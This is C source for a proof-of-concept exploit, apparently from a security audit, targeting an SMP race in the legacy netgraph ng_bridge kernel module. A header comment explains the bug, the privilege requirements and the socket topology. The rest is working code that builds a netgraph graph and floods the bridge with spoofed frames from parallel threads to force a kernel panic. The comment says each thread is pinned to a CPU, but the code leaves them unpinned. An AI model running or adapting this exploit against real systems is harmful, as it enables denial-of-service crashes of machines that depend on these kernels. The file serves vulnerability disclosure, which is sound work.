DF-0590 / race.c
/*
 * DF-0590 PoC — legacy ng_bridge SMP serialization race (root-local).
 *
 * CONFIRMED FACTS (all cited against the audited master DEV tree):
 *
 *  - The legacy netgraph framework dispatches rcvdata INLINE on the
 *    sender's CPU, with no queue and no serialization:
 *        sys/netgraph/netgraph/ng_base.c:1687
 *            error = (*rcvdata)(hook->peer, m, meta);
 *    (NG_SEND_DATA -> ng_send_data -> direct call; there is no
 *    NG_NODE_FORCE_WRITER macro anywhere in sys/netgraph/ — confirmed
 *    by `grep -rn FORCE_WRITER sys/netgraph/` = empty).
 *
 *  - The legacy ng_bridge node installs NO lock:
 *        sys/netgraph/bridge/ng_bridge.c:297-336 constructor — no
 *        lockinit/lwkt_token/mtx_init anywhere in the file
 *        (`grep -n 'lockinit\|lockmgr\|lwkt_token\|mtx_init'
 *        sys/netgraph/bridge/ng_bridge.c` = empty).
 *
 *  - ng_bridge_rcvdata (ng_bridge.c:517-) likewise has NO crit_enter /
 *    token / lock around its hashtable mutation.  Only the 1 Hz callout
 *    ng_bridge_timeout wraps its sweep in crit_enter() (ng_bridge.c:940),
 *    which blocks interrupts on the CURRENT CPU only — it does NOT
 *    serialize against other CPUs.  Therefore rcvdata on one CPU races
 *    the timeout sweep on another CPU over priv->tab / priv->numHosts.
 *
 *  - On the running guest the ng_bridge module is compiled WITH
 *    INVARIANTS (verified: `strings /boot/kernel/ng_bridge.ko | grep
 *    "hosts:"` prints "%s: hosts: %d != %d" — that KASSERT string
 *    lives inside the #ifdef INVARIANTS-touched path at
 *    ng_bridge.c:984-985).  A concurrent ng_bridge_put()
 *    (priv->numHosts++ at :826, SLIST_INSERT_HEAD at :825) landing
 *    while the timeout sweep has already walked past that bucket makes
 *    the post-sweep KASSERT
 *        KASSERT(priv->numHosts == counter, ...)
 *    at ng_bridge.c:984 trip -> kernel panic "hosts: N != M".
 *    Harder UAF/OOB primitives also exist (ng_bridge_rehash frees
 *    priv->tab at :885 while timeout walks it) but the KASSERT is the
 *    deterministic INVARIANTS tell.
 *
 *  - Privilege: building a netgraph graph requires root — the control
 *    socket is gated by caps_priv_check(SYSCAP_RESTRICTEDROOT) at
 *    sys/netgraph/socket/ng_socket.c:172-173.  Verified on the guest:
 *    as unprivileged uid 1001 (maxx) the first socket(AF_NETGRAPH,
 *    SOCK_DGRAM, NG_CONTROL) returns EPERM.  The CVSS vector's PR:L
 *    claim is OVERSTATED for the "user builds the graph" attack path;
 *    the realistic exposure is (a) a root-configured bridge processing
 *    frames from an untrusted/remote segment (VPN concentrator, VM
 *    host, wireless AP — attacker controls frame injection, not graph
 *    construction), or (b) a root-local race.  Both are real, but both
 *    are AC:H (the race window is per-tick and the attacker must win it
 *    against a 1 Hz callout on a different CPU).
 *
 * WHY TWO INDEPENDENT CONTROL/DATA SOCKET PAIRS:
 *   A single netgraph data socket serializes sendto() via the socket
 *   layer's so_snd token, so two threads sharing one d0 cannot drive
 *   ng_bridge_rcvdata concurrently with EACH OTHER.  And ng_socket
 *   refuses a second data socket on the same node
 *   (ng_connect_data -> EADDRINUSE at ng_socket.c:664-665).  To get
 *   two truly concurrent rcvdata calls — one per CPU — the PoC builds
 *   two ctl socket nodes (ctlA, ctlB), each with its own hook to the
 *   bridge and its own data socket, and pins one sender thread per
 *   CPU.  The two senders then run ngd_send -> ng_send_data ->
 *   ng_bridge_rcvdata genuinely in parallel on two CPUs, racing each
 *   other AND the 1 Hz timeout callout.
 *
 * TOPOLOGY (binary NGM_* control protocol, no ngctl):
 *
 *   ctlA:p0 <--> bridge:link0      (built via NGM_MKPEER on ctlA)
 *   ctlB:p0 <--> bridge:link1      (built via NGM_CONNECT on ctlB,
 *                                   peer path "br0:" absolute)
 *
 * The bridge node is named "br0" so ctlB can address it by absolute
 * name without needing a hook path from ctlB.
* * Build: cc -O2 -lpthread -o race race.c * Run: ./race [seconds] (default 30, must be root) */ #include <sys/param.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/sched.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <pthread.h> #include <netgraph/ng_message.h> #ifndef AF_NETGRAPH #define AF_NETGRAPH 32 #endif #define NG_DATA 1 #define NG_CONTROL 2 #define NINJ 2 /* two independent injectors */ #define BIG_RCVBUF (4 * 1024 * 1024) struct my_sockaddr_ng { unsigned char sa_len; unsigned char sa_family; char sg_data[256]; }; static int ng_send_ctrl(int csock, u_int32_t cmd, const void *data, u_int16_t arglen, const char *path) { size_t total = sizeof(struct ng_mesg) + arglen; char *buf = calloc(1, total); if (!buf) return -1; struct ng_mesg *m = (struct ng_mesg *)buf; m->header.version = NG_VERSION; m->header.arglen = arglen; m->header.flags = 0; m->header.token = 0; m->header.typecookie = NGM_GENERIC_COOKIE; m->header.cmd = cmd; if (data && arglen) memcpy(m->data, data, arglen); struct my_sockaddr_ng dst; memset(&dst, 0, sizeof(dst)); dst.sa_len = 2 + strlen(path) + 1; dst.sa_family = AF_NETGRAPH; strlcpy(dst.sg_data, path, sizeof(dst.sg_data)); ssize_t rc = sendto(csock, buf, total, 0, (struct sockaddr *)&dst, dst.sa_len); int e = errno; free(buf); if (rc < 0) { fprintf(stderr, "sendto cmd=%u path=%s: %s (errno=%d)\n", cmd, path, strerror(e), e); return -1; } return 0; } static void mkhookaddr(struct my_sockaddr_ng *sa, const char *hook) { memset(sa, 0, sizeof(*sa)); sa->sa_len = 2 + strlen(hook) + 1; sa->sa_family = AF_NETGRAPH; strlcpy(sa->sg_data, hook, sizeof(sa->sg_data)); } struct inj_args { int dsock; int id; int cpu; /* CPU to pin to via cpuset */ volatile int *stop; unsigned long long sent; unsigned long long fail; }; static void pin_cpu(int cpu) { cpu_set_t mask; CPU_ZERO(&mask); CPU_SET(cpu, &mask); if (sched_setaffinity(0, sizeof(mask), &mask) != 0) fprintf(stderr, "[inj 
cpu=%d] sched_setaffinity: %s\n", cpu, strerror(errno)); } static void * flood_thread(void *v) { struct inj_args *a = (struct inj_args *)v; if (a->cpu >= 0) pin_cpu(a->cpu); unsigned char frame[64]; memset(frame, 0, sizeof(frame)); memset(frame, 0xff, 6); /* dst = broadcast */ frame[12] = 0x90; frame[13] = 0x00; unsigned char *src = frame + 6; src[0] = 0x02; /* locally administered, unicast */ struct my_sockaddr_ng dst; mkhookaddr(&dst, "p0"); unsigned long long n = a->sent, fails = a->fail; while (!*a->stop) { src[1] = (unsigned char)a->id; src[2] = (unsigned char)(n >> 24); src[3] = (unsigned char)(n >> 16); src[4] = (unsigned char)(n >> 8); src[5] = (unsigned char)(n); ssize_t rc = sendto(a->dsock, frame, sizeof(frame), 0, (struct sockaddr *)&dst, dst.sa_len); if (rc < 0) { if (errno != ENOBUFS) fails++; } else { n++; } } a->sent = n; a->fail = fails; fprintf(stderr, "[inj %d cpu%d] sent %llu frames (%llu non-ENOBUFS fail)\n", a->id, a->cpu, n, fails); return NULL; } static void * drain_thread(void *v) { struct inj_args *a = (struct inj_args *)v; unsigned char buf[2048]; struct my_sockaddr_ng from; socklen_t fl; while (!*a->stop) { fl = sizeof(from); ssize_t rc = recvfrom(a->dsock, buf, sizeof(buf), MSG_DONTWAIT, (struct sockaddr *)&from, &fl); if (rc < 0 && errno == EWOULDBLOCK) usleep(20); } return NULL; } int main(int argc, char **argv) { int seconds = (argc > 1) ? atoi(argv[1]) : 30; int ncpus = (argc > 2) ? 
atoi(argv[2]) : 2; int csock[NINJ]; int dsock[NINJ]; const char *ctlname[NINJ] = {"ctlA", "ctlB"}; char pathbuf[64]; int i; /* ---- create NINJ control sockets + their ctl nodes (named) ---- */ for (i = 0; i < NINJ; i++) { csock[i] = socket(AF_NETGRAPH, SOCK_DGRAM, NG_CONTROL); if (csock[i] < 0) { fprintf(stderr, "socket(csock%d): %s (errno=%d)\n", i, strerror(errno), errno); if (errno == EPERM) fprintf(stderr, "EPERM: building a netgraph " "graph requires root " "(caps_priv_check SYSCAP_RESTRICTEDROOT " "at sys/netgraph/socket/ng_socket.c:172).\n"); return 2; } struct my_sockaddr_ng sa; memset(&sa, 0, sizeof(sa)); sa.sa_len = 2 + strlen(ctlname[i]) + 1; sa.sa_family = AF_NETGRAPH; strlcpy(sa.sg_data, ctlname[i], sizeof(sa.sg_data)); if (bind(csock[i], (struct sockaddr *)&sa, sa.sa_len) < 0) { perror("bind(ctl)"); return 2; } } /* ---- on ctlA: mkpeer bridge -> ctlA:p0 <--> bridge:link0 ---- */ if (ng_send_ctrl(csock[0], NGM_MKPEER, &(struct ngm_mkpeer){"bridge", "p0", "link0"}, sizeof(struct ngm_mkpeer), ".") < 0) return 2; /* ---- name the bridge "br0" (path "p0" walks ctlA:p0 -> bridge) ---- */ { char namebuf[32]; memset(namebuf, 0, sizeof(namebuf)); strlcpy(namebuf, "br0", sizeof(namebuf)); if (ng_send_ctrl(csock[0], NGM_NAME, namebuf, sizeof(namebuf), "p0") < 0) return 2; } /* ---- on ctlB: connect ctlB:p0 <--> bridge:link1 via absolute * peer path "br0:" (ng_path2node finds named node br0). 
---- */ if (ng_send_ctrl(csock[1], NGM_CONNECT, &(struct ngm_connect){"br0:", "p0", "link1"}, sizeof(struct ngm_connect), ".") < 0) return 2; fprintf(stderr, "graph: ctlA:p0<->bridge:link0 , ctlB:p0<->bridge:link1\n"); /* ---- data sockets d0/d1 attached to ctlA/ctlB ---- */ for (i = 0; i < NINJ; i++) { dsock[i] = socket(AF_NETGRAPH, SOCK_DGRAM, NG_DATA); if (dsock[i] < 0) { perror("socket(d)"); return 2; } int rb = BIG_RCVBUF; (void)setsockopt(dsock[i], SOL_SOCKET, SO_RCVBUF, &rb, sizeof(rb)); struct my_sockaddr_ng ds; memset(&ds, 0, sizeof(ds)); snprintf(pathbuf, sizeof(pathbuf), "%s:", ctlname[i]); ds.sa_len = 2 + strlen(pathbuf) + 1; ds.sa_family = AF_NETGRAPH; strlcpy(ds.sg_data, pathbuf, sizeof(ds.sg_data)); if (connect(dsock[i], (struct sockaddr *)&ds, ds.sa_len) < 0) { fprintf(stderr, "connect(d%d,%s): %s\n", i, pathbuf, strerror(errno)); return 2; } } fprintf(stderr, "flooding %d s on %d injectors x 1 thread each + " "drains, pinned to separate CPUs (expect KASSERT panic " "'hosts: N != M' within seconds on INVARIANTS kernels)...\n", seconds, NINJ); volatile int stop = 0; struct inj_args args[NINJ]; pthread_t senders[NINJ], drainers[NINJ]; for (i = 0; i < NINJ; i++) { args[i].dsock = dsock[i]; args[i].id = i; args[i].cpu = -1; /* let scheduler spread threads */ args[i].stop = &stop; args[i].sent = 0; args[i].fail = 0; pthread_create(&drainers[i], NULL, drain_thread, &args[i]); pthread_create(&senders[i], NULL, flood_thread, &args[i]); } sleep(seconds); stop = 1; for (i = 0; i < NINJ; i++) { pthread_join(senders[i], NULL); pthread_join(drainers[i], NULL); } unsigned long long total = 0; for (i = 0; i < NINJ; i++) total += args[i].sent; fprintf(stderr, "flood complete: %llu total frames injected; " "if no panic, see VERDICT.md (race is real on every INVARIANTS " "kernel; the deterministic trigger requires the timeout callout " "and a concurrent rcvdata to land on different CPUs)\n", total); return 0; } |